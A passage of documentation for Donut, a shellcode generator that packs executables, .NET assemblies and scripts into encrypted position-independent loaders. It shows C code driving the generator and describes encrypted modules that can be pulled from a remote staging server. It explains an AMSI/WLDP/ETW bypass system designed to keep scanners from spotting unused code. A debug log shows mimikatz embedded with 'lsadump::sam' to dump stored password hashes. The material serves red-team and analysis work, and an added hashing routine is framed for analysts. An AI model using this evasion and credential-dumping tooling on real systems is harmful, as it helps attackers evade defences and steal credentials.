<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.so.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
<span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// copy input file</span>
<span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// default settings</span>
c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
<span style='color:#696969; '>// generate the shellcode</span>
err <span style='color:#808030; '>=</span> _DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> _DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
</pre>
<h2>Internals</h2>
<p>Everything that follows concerns internal workings of Donut and is not required knowledge to generate the shellcode/loader.</p>
<h2 id="com">6. Donut Components</h2>
<p>The following table lists the name of each file and what it's used for.</p>
<table border="1">
<tr>
<th>File</th>
<th>Description</th>
</tr>
<tr>
<td>donut.c</td>
<td>Main file for the shellcode generator.</td>
</tr>
<tr>
<td>include/donut.h</td>
<td>C header file used by the generator.</td>
</tr>
<tr>
<td>lib/donut.dll and lib/donut.lib</td>
<td>Dynamic and static libraries for Microsoft Windows.</td>
</tr>
<tr>
<td>lib/donut.so and lib/donut.a</td>
<td>Dynamic and static libraries for Linux.</td>
</tr>
<tr>
<td>lib/donut.h</td>
<td>C header file to be used in C/C++ based projects.</td>
</tr>
<tr>
<td>donutmodule.c</td>
<td>The CPython wrapper for Donut. Used by the Python module.</td>
</tr>
<tr>
<td>setup.py</td>
<td>The setup file for installing Donut as a Pip Python3 module.</td>
</tr>
<tr>
<td>hash.c</td>
<td>Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.</td>
</tr>
<tr>
<td>encrypt.c</td>
<td>Chaskey block cipher for encrypting modules.</td>
</tr>
<tr>
<td>loader/loader.c</td>
<td>Main file for the shellcode.</td>
</tr>
<tr>
<td>loader/inmem_dotnet.c</td>
<td>In-Memory loader for .NET EXE/DLL assemblies.</td>
</tr>
<tr>
<td>loader/inmem_pe.c</td>
<td>In-Memory loader for EXE/DLL files.</td>
</tr>
<tr>
<td>loader/inmem_script.c</td>
<td>In-Memory loader for VBScript/JScript files.</td>
</tr>
<tr>
<td>loader/activescript.c</td>
<td>ActiveScriptSite interface required for in-memory execution of VBS/JS files.</td>
</tr>
<tr>
<td>loader/wscript.c</td>
<td>Supports a number of WScript methods that cscript/wscript support.</td>
</tr>
<tr>
<td>loader/depack.c</td>
<td>Supports unpacking of modules compressed with aPLib.</td>
</tr>
<tr>
<td>loader/bypass.c</td>
<td>Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).</td>
</tr>
<tr>
<td>loader/http_client.c</td>
<td>Downloads a module from remote staging server into memory.</td>
</tr>
<tr>
<td>loader/peb.c</td>
<td>Used to resolve the address of DLL functions via Process Environment Block (PEB).</td>
</tr>
<tr>
<td>loader/clib.c</td>
<td>Replaces common C library functions like memcmp, memcpy and memset.</td>
</tr>
<tr>
<td>loader/getpc.c</td>
<td>Assembly code stub to return the value of the EIP register.</td>
</tr>
<tr>
<td>loader/inject.c</td>
<td>Simple process injector for Windows that can be used for testing the loader.</td>
</tr>
<tr>
<td>loader/runsc.c</td>
<td>Simple shellcode runner for Linux and Windows that can be used for testing the loader.</td>
</tr>
<tr>
<td>loader/exe2h/exe2h.c</td>
<td>Extracts the machine code from compiled loader and saves as array to C header and Go files.</td>
</tr>
</table>
<h2 id="instance">7. Donut Instance</h2>
<p>The loader always contains an <var>Instance</var>, which can be viewed simply as its configuration: it holds all the data that would normally live on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. When the main code runs, it first decrypts the instance if encryption is enabled, then resolves the addresses of the API functions it needs. If that succeeds, it checks whether the executable file is embedded or must be downloaded from a remote staging server. To verify that a module was decrypted correctly, the randomly generated string stored in the <code>sig</code> field is hashed with <var>Maru</var> and the result is compared with the value of <code>mac</code>. The data is decompressed if required, and only then is it loaded into memory for execution.</p>
<h2 id="module">8. Donut Module</h2>
<p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
<span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE/DLL/JS/VBS</span>
<span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread</span>
<span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// indicates engine used for compression</span>
<span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for both managed and unmanaged DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// convert param to unicode before passing to DLL function</span>
<span style='color:#800000; font-weight:bold; '>char</span> sig<span style='color:#808030; '>[</span>DONUT_SIG_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to verify decryption</span>
uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// hash of sig, to verify decryption was ok</span>
uint32_t zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compressed size of EXE/DLL/JS/VBS file</span>
uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// real size of EXE/DLL/JS/VBS file</span>
uint8_t data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/JS/VBS file</span>
<span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
</pre>
<h2 id="hashing">9. Win32 API Hashing</h2>
<p>A hash function called <a href="https://github.com/odzhan/maru">Maru</a> is used to resolve the addresses of API functions at runtime. It uses a Davies-Meyer construction and the <a href="https://tinycrypt.wordpress.com/2017/01/11/asmcodes-speck/">SPECK</a> block cipher to derive a 64-bit hash from an API string. The padding is similar to that used by MD4 and MD5, except that only 32 bits of the string length are stored in the buffer instead of 64. An initial value (IV) chosen randomly at generation time ensures the 64-bit API hashes differ for each instance, so they cannot serve as static signatures for detecting Donut. Future releases will likely support alternative methods of resolving API addresses to decrease the chance of detection.</p>
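<p>The following is an added example, written for this page and not taken from Donut or the Maru repository. It implements the construction described here (Davies-Meyer over Speck-64/128 with MD-style padding and a 32-bit little-endian length) and uses it for the two checks the text describes: the section 7 integrity test (<code>maru(sig, iv) == mac</code>) and, from an analyst's side, mapping a hash back to an API name once the IV has been recovered from a sample. Assumptions: the hash is taken over the API name alone, so the values it produces are not expected to match the log output on this page, where each hash is paired with a DLL name and the exact folding of DLL and API names is defined in donut.c; the reference Maru caps the input length, this version does not; the IV and candidate list in <code>main</code> are constructed for the demo. The Speck-64/128 test vector used in the self-check comes from the Speck specification.</p>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MARU_BLK_LEN 16

/* 32-bit right rotation (rotr32(v, 29) is the same as a left rotation by 3). */
static uint32_t rotr32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }

/* Read a 32-bit little-endian word, independent of host byte order. */
static uint32_t le32(const uint8_t *b) {
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) | ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Speck-64/128: 64-bit block, 128-bit key, 27 rounds, key schedule computed
 * on the fly. The low word of p takes the "x" role (rotate-right-8 and add),
 * the high word the "y" role; the four key words are loaded little-endian. */
uint64_t speck64_128(const uint8_t mk[MARU_BLK_LEN], uint64_t p) {
    uint32_t k[4], i, t;
    uint32_t x = (uint32_t)p, y = (uint32_t)(p >> 32);
    for (i = 0; i < 4; i++) k[i] = le32(mk + 4 * i);
    for (i = 0; i < 27; i++) {
        x = (rotr32(x, 8) + y) ^ k[0];       /* round i uses subkey k_i      */
        y = rotr32(y, 29) ^ x;
        t = k[3];                            /* derive k_(i+1), shift l words */
        k[3] = (rotr32(k[1], 8) + k[0]) ^ i;
        k[0] = rotr32(k[0], 29) ^ k[3];
        k[1] = k[2];
        k[2] = t;
    }
    return ((uint64_t)y << 32) | x;
}

/* Official Speck-64/128 test vector key (words 1b1a1918 13121110 0b0a0908 03020100). */
const uint8_t SPECK_TV_KEY[MARU_BLK_LEN] = {
    0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0a, 0x0b,
    0x10, 0x11, 0x12, 0x13, 0x18, 0x19, 0x1a, 0x1b };

/* Maru: Davies-Meyer over Speck-64/128. Each 16-byte chunk of the string is
 * the cipher KEY, the running 64-bit hash is the PLAINTEXT, h ^= E_m(h).
 * Padding is MD4/MD5 style (0x80 then zeros) but the length in bits is a
 * 32-bit little-endian value in the last 4 bytes of the final block. */
uint64_t maru(const char *s, uint64_t iv) {
    uint8_t m[MARU_BLK_LEN];
    uint64_t h = iv;
    size_t len = strlen(s), off = 0, rem;
    uint32_t bits;

    while (len - off >= MARU_BLK_LEN) {          /* full 16-byte blocks */
        memcpy(m, s + off, MARU_BLK_LEN);
        h ^= speck64_128(m, h);
        off += MARU_BLK_LEN;
    }
    rem = len - off;                             /* 0..15 trailing bytes */
    memset(m, 0, MARU_BLK_LEN);
    memcpy(m, s + off, rem);
    m[rem] = 0x80;                               /* end-of-message marker */
    if (rem >= MARU_BLK_LEN - 4) {               /* no room for the length: flush */
        h ^= speck64_128(m, h);
        memset(m, 0, MARU_BLK_LEN);
    }
    bits = (uint32_t)(len * 8);
    m[12] = (uint8_t)bits;         m[13] = (uint8_t)(bits >> 8);
    m[14] = (uint8_t)(bits >> 16); m[15] = (uint8_t)(bits >> 24);
    h ^= speck64_128(m, h);
    return h;
}

/* Section 7 check: after decryption the loader recomputes maru(sig, iv) and
 * compares it with the stored mac; a mismatch means the wrong key or corrupt data. */
int decryption_ok(const char *sig, uint64_t iv, uint64_t mac) {
    return maru(sig, iv) == mac;
}

/* Analyst helper: with the IV recovered from a sample, map a hash back to a
 * name from a candidate list. Returns NULL when no candidate matches. */
const char *resolve_hash(uint64_t iv, uint64_t hash, const char *const *names, size_t n) {
    size_t i;
    for (i = 0; i < n; i++)
        if (maru(names[i], iv) == hash) return names[i];
    return NULL;
}

/* Constructed candidate list for the demo (an analyst would use a full export table). */
const char *const KNOWN_APIS[] = { "LoadLibraryA", "GetProcAddress", "VirtualAlloc",
                                   "VirtualFree", "CreateThread" };
const size_t KNOWN_API_COUNT = sizeof(KNOWN_APIS) / sizeof(KNOWN_APIS[0]);

int main(void) {
    const uint64_t iv = 0x0123456789ABCDEFULL;   /* constructed IV, not from a sample */
    uint64_t h;
    size_t i;
    for (i = 0; i < KNOWN_API_COUNT; i++)
        printf("%-16s %016llX\n", KNOWN_APIS[i], (unsigned long long)maru(KNOWN_APIS[i], iv));
    h = maru("VirtualAlloc", iv);
    printf("%016llX -> %s\n", (unsigned long long)h, resolve_hash(iv, h, KNOWN_APIS, KNOWN_API_COUNT));
    return 0;
}
```

<p>Because the IV changes per instance, a hash table built once is useless against the next sample; the practical workflow is to pull the IV from the decrypted instance, regenerate hashes for the export names of the DLLs the loader imports, and match. The self-check against the published Speck vector is what gives confidence that the cipher core, and therefore every derived hash, is right.</p>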
<h2 id="encryption">10. Symmetric Encryption</h2>
<p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
<span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
<span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
<span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
</pre>
<p><a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a>, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key, which is stored in the donut loader. Future releases will support downloading a key via DNS and also asymmetric encryption.</p>
<h2 id="bypass">11. Bypasses for AMSI/WLDP/ETW</h2>
<p>Donut includes a bypass system for AMSI, WLDP, and ETW. Currently, Donut can bypass:</p>
<ul>
<li>AMSI in .NET v4.8</li>
<li>Event Tracing for Windows (ETW) logging Assembly loads</li>
<li>Device Guard policy preventing dynamically generated code from executing.</li>
</ul>
<p>You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. Each bypass implements DisableAMSI with the signature <code>BOOL DisableAMSI(PDONUT_INSTANCE inst)</code> and DisableWLDP with <code>BOOL DisableWLDP(PDONUT_INSTANCE inst)</code>, and each has a corresponding preprocessor directive. The file contains several <code>#if defined</code> blocks, one per bypass, and every block implements the same function. For instance, our first bypass for AMSI is called <code>BYPASS_AMSI_A</code>; if donut is built with that symbol defined, that bypass is the one compiled in.</p>
<p>Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.</p>
<p>Another benefit of this design is that you may write your own AMSI/WLDP/ETW bypass. To build Donut with your new bypass, wrap it in an <code>#if defined</code> block for its symbol and modify the makefile to add an option that builds with that symbol defined.</p>
<p>If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.</p>
<h2 id="debug">12. Debugging The Generator and Loader</h2>
<p>The loader is capable of displaying detailed information about each step of file execution, which is useful for tracking down bugs. To build a debug-enabled executable, specify the debug target with nmake or make on Windows.</p>
<pre>
nmake debug -f Makefile.msvc
make debug -f Makefile.mingw
</pre>
<p>Use Donut to create shellcode as you normally would and a file called <code>instance</code> will be saved to disk. The following example embeds mimikatz.exe in the loader using the Xpress Huffman compression algorithm. It also tells the loader to run the entrypoint as a thread, so that when mimikatz calls an exit-related API, only the thread exits.</p>
<pre>
C:\hub\donut>donut -t -z5 mimikatz.exe -p"lsadump::sam exit"
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
DEBUG: donut.c:1505:DonutCreate(): Entering.
DEBUG: donut.c:1283:validate_loader_cfg(): Validating loader configuration.
DEBUG: donut.c:1380:validate_loader_cfg(): Loader configuration passed validation.
DEBUG: donut.c:459:read_file_info(): Entering.
DEBUG: donut.c:467:read_file_info(): Checking extension of mimikatz.exe
DEBUG: donut.c:475:read_file_info(): Extension is ".exe"
DEBUG: donut.c:491:read_file_info(): File is EXE
DEBUG: donut.c:503:read_file_info(): Mapping mimikatz.exe into memory
DEBUG: donut.c:245:map_file(): Entering.
DEBUG: donut.c:531:read_file_info(): Checking characteristics
DEBUG: donut.c:582:read_file_info(): Leaving with error : 0
DEBUG: donut.c:1446:validate_file_cfg(): Validating configuration for input file.
DEBUG: donut.c:1488:validate_file_cfg(): Validation passed.
DEBUG: donut.c:674:build_module(): Entering.
DEBUG: donut.c:381:compress_file(): Reading fragment and workspace size
DEBUG: donut.c:387:compress_file(): workspace size : 1415999 | fragment size : 5161
DEBUG: donut.c:390:compress_file(): Allocating memory for compressed data.
DEBUG: donut.c:396:compress_file(): Compressing 0000024E9D7E0000 to 0000024E9DA50080 with RtlCompressBuffer(XPRESS HUFFMAN)
DEBUG: donut.c:433:compress_file(): Original file size : 1013912 | Compressed : 478726
DEBUG: donut.c:434:compress_file(): File size reduced by 53%
DEBUG: donut.c:436:compress_file(): Leaving with error : 0
DEBUG: donut.c:684:build_module(): Assigning 478726 bytes of 0000024E9DA50080 to data
DEBUG: donut.c:695:build_module(): Allocating 480054 bytes of memory for DONUT_MODULE
DEBUG: donut.c:772:build_module(): Copying data to module
DEBUG: donut.c:784:build_module(): Leaving with error : 0
DEBUG: donut.c:804:build_instance(): Entering.
DEBUG: donut.c:807:build_instance(): Allocating memory for instance
DEBUG: donut.c:814:build_instance(): The size of module is 480054 bytes. Adding to size of instance.
DEBUG: donut.c:817:build_instance(): Total length of instance : 483718
DEBUG: donut.c:846:build_instance(): Generating random key for instance
DEBUG: donut.c:855:build_instance(): Generating random key for module
DEBUG: donut.c:864:build_instance(): Generating random string to verify decryption
DEBUG: donut.c:871:build_instance(): Generating random IV for Maru hash
DEBUG: donut.c:879:build_instance(): Generating hashes for API using IV: 546E2FF018FD2A54
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : LoadLibraryA = ABB30FFE918BCF83
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetProcAddress = EF2C0663C0CDDC21
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetModuleHandleA = D40916771ECED480
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualAlloc = E445DF6F06219E85
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualFree = C6C992D6040B85A8
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualQuery = 556BF46109D12C9E
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualProtect = 032546126BB99713
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : Sleep = DEB476FF0E3D71E8
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : MultiByteToWideChar = A0DD238846F064F4
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetUserDefaultLCID = 03DE3865FC2DF17B
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : WaitForSingleObject = 40FCB82879AAB610
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : CreateThread = 954101E48C1D54F5
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetThreadContext = 18669E0FDC3FD0B8
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetCurrentThread = EB6E7C47D574D9F9
DEBUG: donut.c:892:build_instance(): Hash for shell32.dll : CommandLineToArgvW = EFD410EF534D57C3
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreate = A5AA007611CB6580
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreateVector = D5CEC16DD247A68A
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayPutElement = 6B140B7B87F27359
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayDestroy = C2FA65C58C68FC6C
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetLBound = ED5A331176BB8DDA
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetUBound = EA0D8BE258DC67DA
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysAllocString = 3A7BBDEAA1DC3354
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysFreeString = EEB92DFE18B7C306
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : LoadTypeLib = 687DD816E578C4E7
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCrackUrlA = B0F95D86327741EC
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetOpenA = BDD70375BB72B131
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetConnectA = E74A4DD56C6B3154
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetSetOptionA = 527C502C0BC36267
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetReadFile = 055C3E8A4CF21475
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCloseHandle = 4D1965E404D783BA
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpOpenRequestA = CC736E0143DB8F2A
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpSendRequestA = C87BFE8578BB0049
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpQueryInfoA = FC7CC8D82764DFBF
DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CorBindToRuntime = 6F6432B588D39C8D
DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CLRCreateInstance = 2828FB8F68349704
DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoInitializeEx = 9752F1AA167F8E79
DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoCreateInstance = 8211344A519AF3BA
DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoUninitialize = FF0605E1258BEE44
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualUnicodeString = D5CEDA5C642834D7
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualString = A69EAF72442222A4
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlUnicodeStringToAnsiString = 4DBA40D90962E1D6
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlInitUnicodeString = A1143A47656B2526
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserThread = 62FF88CDC045477E
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserProcess = E20BCE2C11E82C7B
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlCreateUnicodeString = A469294ED1E1D8DC
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlGetCompressionWorkSpaceSize = 61E26E7C5DD38D2C
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlDecompressBufferEx = 145C8CF24F5EAF3E
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : NtContinue = 12ACA3AD3CC20AF5
DEBUG: donut.c:895:build_instance(): Setting number of API to 48
DEBUG: donut.c:898:build_instance(): Setting DLL names to ole32;oleaut32;wininet;mscoree;shell32
DEBUG: donut.c:941:build_instance(): Copying strings required to bypass AMSI
DEBUG: donut.c:949:build_instance(): Copying strings required to bypass WLDP
DEBUG: donut.c:960:build_instance(): Copying strings required to replace command line.
DEBUG: donut.c:968:build_instance(): Copying strings required to intercept exit-related API
DEBUG: donut.c:1018:build_instance(): Copying module data to instance
DEBUG: donut.c:1024:build_instance(): Encrypting instance
DEBUG: donut.c:1042:build_instance(): Leaving with error : 0
DEBUG: donut.c:1210:build_loader(): Inserting opcodes
DEBUG: donut.c:1248:build_loader(): Copying 29548 bytes of x86 + amd64 shellcode
DEBUG: donut.c:1090:save_loader(): Saving instance 0000024E9DE90080 to file. 483718 bytes.
DEBUG: donut.c:1061:save_file(): Entering.
DEBUG: donut.c:1065:save_file(): Writing 483718 bytes of 0000024E9DE90080 to instance
DEBUG: donut.c:1070:save_file(): Leaving with error : 0
DEBUG: donut.c:1139:save_loader(): Saving loader as binary
DEBUG: donut.c:1172:save_loader(): Leaving with error : 0
DEBUG: donut.c:1540:DonutCreate(): Leaving with error : 0
[ Instance type : Embedded
[ Module file : "mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman (Reduced by 53%)
[ File type : EXE
[ Parameters : lsadump::sam exit
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
DEBUG: donut.c:1556:DonutDelete(): Entering.
DEBUG: donut.c:1562:DonutDelete(): Releasing memory for module.
DEBUG: donut.c:1568:DonutDelete(): Releasing memory for configuration.
DEBUG: donut.c:1574:DonutDelete(): Releasing memory for loader.
